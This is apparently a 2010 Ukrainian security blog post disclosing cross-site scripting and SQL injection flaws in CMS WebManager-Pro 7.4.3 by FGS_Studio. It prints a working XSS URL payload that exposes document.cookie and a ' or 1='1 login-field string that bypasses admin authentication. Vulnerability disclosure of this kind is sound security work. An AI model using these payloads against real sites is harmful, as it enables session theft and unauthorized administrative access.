XSS та SQL Injection в CMS WebManager-Pro
19:15 30.10.201028.07.2010
У липні, 02.07.2010, а також додатково сьогодні, я знайшов Cross-Site Scripting та SQL Injection уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в CMS WebManager-Pro.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
30.10.2010
XSS:
http://site/index.php?word[]=%22%20onMouseOver=alert(document.cookie)%20
Дана уразливість може використовуватися разом з MouseOverJacking.
SQL Injection (Authentication Bypass):
На сторінці http://site/admin/ при відключенних mq:
' or 1='1
В полі Логин.
Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.